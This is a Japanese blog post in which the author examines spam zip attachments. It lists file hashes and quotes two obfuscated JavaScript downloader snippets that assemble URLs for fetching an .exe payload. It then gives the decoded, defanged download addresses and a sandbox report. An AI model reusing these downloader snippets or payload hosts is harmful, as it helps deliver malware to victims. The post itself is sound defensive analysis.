ども。こんばんは。
最近異様にスパムが来ます。
決まってzipファイルが添付されていて、今んとここんな感じ。
6032eaec1f2bc8e7dd3397752d95e9fa Document 2.zip
747a0958f1a640e69dffb47d8f722d65 Image0812377663977.zip
9c7e61191cd20799409fb0fc7846d647 Image83801387530425.zip
4a7d8aa3770ab633f9f48187d60a9e05 SKMBT_C6626610665883.zip
bf2d74135b470b9009e59c47dd2e4c61 SKMBT_C9590303963783.zip
21d237c9565504b7cc679da9ec93e361 invoice_[メールアドレスっぽい]_316566.zip
e613abec63571b92f76a67bb7f7ad98b scanned_doc_00594679.zip
1d151d97620d7a0aa8922ecdcf4e5331 scanned_doc_09622010.zip
c57c6807da4c057ba33bb41de664b00d statement_[メールアドレスっぽい]_337450.zip
650e3adc5475e2a43ec1ea281825c384 warning_66901940.zip
Fromが自分のアドレスで本文に
Sent from my Sony Xperia™ smartphone
とか書いてあるやつもあった。。。おいらはXperiaは持ってないぞ。。。
ちゃんと全部は調べてないのですが、中身はほとんどJSっぽい。
とりあえず適当に2つくらい解凍後のJSを見ていると両方ともにこんなコードが・・・
その1
screensaver(“h”+”ttp://ww”+”w.”+”gosocial”+”.org”+”/7″+”62″+(“attractive”,”freehold”,”wallow”,”trg22e”)+”2.”+”exe”,”WSnG
AqVdLdb”);その2
screensaver((“interim”,”sticker”,”awful”,”changelog”,”h”)+(“unfeigned”,”jasper”,”tt”)+(“myrtle”,”happening”,”differ”,”po
lymer”,”p://dev2″)+(“alternative”,”borough”,”minds”,”skype”,”.d”)+”ev.f”+”an”+(“bronchitis”,”partiality”,”defendant”,”au
burn”,”js.com/7″)+(“inlet”,”alloy”,”racial”,”carey”,”62″)+(“discernment”,”spies”,”surely”,”tr”)+(“confusion”,”montana”,”
g2″)+”2e2.exe”
それぞれアクセス先はこうなると思われ。
hxxp://www[.]gosocial.org/762trg22e2.exe
hxxp://dev2[.]dev[.]fanjs[.]com/762trg22e2.exe
「762trg22e2.exe」を落とそうとJQueryのscreensaverでアクセスさせるっぽい。
両方アクセスしてみるとファイルはありましたね。ハッシュも同じですね。
38c9364d25d3893cef68e1c301895c6f 762trg22e2.exe
動的解析結果
https://malwr.com/analysis/M2ZmNWJkODNjYWNlNGJlYzk1ZDBhMDQyNjc3YTU4Yzc/
こいつ何するんだろう?
ちな、Nroton先生では引っかかりませぬ。というかまだ何処のベンダーでも引っかからないっぽい。
うーん。残りのやつも調べてもおんなじ感じがするなー。
それにしてもForefronで止まらないってなんでだろう・・・。
てかこのメールが着始めたメールアドレスあんまり外に出してないのになー。腹立つなー。
ではでは。またの機会に。